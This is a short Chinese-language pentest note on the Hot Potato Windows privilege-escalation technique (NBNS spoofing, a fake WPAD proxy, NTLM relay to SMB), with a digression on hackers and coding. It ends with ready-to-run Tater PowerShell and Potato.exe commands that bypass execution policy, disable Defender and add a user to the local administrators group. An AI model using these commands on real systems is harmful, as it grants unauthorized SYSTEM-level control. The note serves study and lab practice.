HotPotato提权

参考资料：

• https://pentestlab.blog/2017/04/13/hot-potato/
• hot-potato漏洞发现者的博客
• https://ivanitlearning.wordpress.com/2019/07/20/potato-privilege-escalation-exploits-for-windows/comment-page-1/
• https://github.com/Kevin-Robertson/Tater
• NTLM Reflection Bugs

视频教程地址：https://www.bilibili.com/video/av91087772

该技术由两个已知的windows问题组成。1. NBNS欺骗 2.NTLM中继与伪造的WPAD代理服务器的实现

NBNS是广播UDP协议，用于Windows环境中常用的名称解析。

通过与SMB相同的协议进行的NTLM身份验证已由Microsoft修补，但是该技术使用HTTP到SMB身份验证以创建高特权服务，因为HTTP请求可能来自诸如Windows更新之类的高特权服务。 由于流量包含NTLM凭据，并且正在通过伪造的代理服务器传递，因此可以对其进行捕获并将其传递给本地SMB侦听器，以创建可以作为SYSTEM执行任何命令的服务。

引申出一个话题，编程能力到底重要不重要？对于渗透测试，coding是一个什么样的地位？黑客就是程序员吗？

水平高超的黑客必定掌握娴熟的编码能力，使用程序来达到自己的目的。

世界上的编程语言几十种上百种，是个人都不能完全掌握。只要完全掌握一种编程语言，加上一种脚本语言就够了。

掌握的越多越好？
二十一世纪是分工与合作的世纪，掌握的多不代表就精通。不如一个人掌握一个方面，然后与其他人合作。

#windows 7运行：
powershell.exe -nop -ep bypass
Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1

Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"

---
#windows 10运行：
powershell.exe -nop -ep bypass
Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
Invoke-Tater -Trigger 2 -Command "net localgroup administrators user /add"

net user user

---

Potato.exe -ip 192.168.1.105 -cmd "C:\\Windows\\System32\\cmd.exe -k net localgroup Administrators user /add" -disable_exhaust true -disable_defender true

运行失败